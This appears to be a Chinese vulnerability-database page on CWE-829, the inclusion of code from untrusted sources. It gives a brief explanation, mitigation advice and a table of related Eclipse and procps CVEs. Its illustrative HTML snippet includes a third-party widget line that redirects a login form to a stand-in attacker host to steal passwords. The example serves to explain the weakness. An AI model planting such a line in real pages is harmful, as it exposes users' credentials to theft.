CWE-829 从非可信控制范围包含功能例程 类弱点 155 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-829 属于不信任源引入漏洞,指软件从非预期控制域导入可执行功能或库。攻击者常通过篡改第三方依赖或供应链,注入恶意代码以执行任意操作,从而破坏系统完整性。开发者应严格验证所有外部组件的来源与完整性,仅集成受信任且经过安全审计的库,并实施最小权限原则,确保仅加载符合预期的功能模块,以阻断不可信代码的执行路径。
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2019-11770 | Eclipse Buildship 加密问题漏洞 — Eclipse Buildship | 8.1 | - | 2019-06-14 |
| CVE-2019-10249 | Xtend和Xtext 安全特征问题漏洞 — Eclipse Xtext | 8.1 | - | 2019-05-06 |
| CVE-2019-10248 | Eclipse Vorto 安全漏洞 — Eclipse Vorto | 8.1 | - | 2019-04-22 |
| CVE-2019-10240 | Eclipse hawkBit 加密问题漏洞 — Eclipse hawkBit | 8.1 | - | 2019-04-03 |
| CVE-2018-1122 | procps-ng 权限许可和访问控制问题漏洞 — procps-ng, procps | 7.0 | - | 2018-05-23 |
CWE-829(从非可信控制范围包含功能例程) 是常见的弱点类别,本平台收录该类弱点关联的 155 条 CVE 漏洞。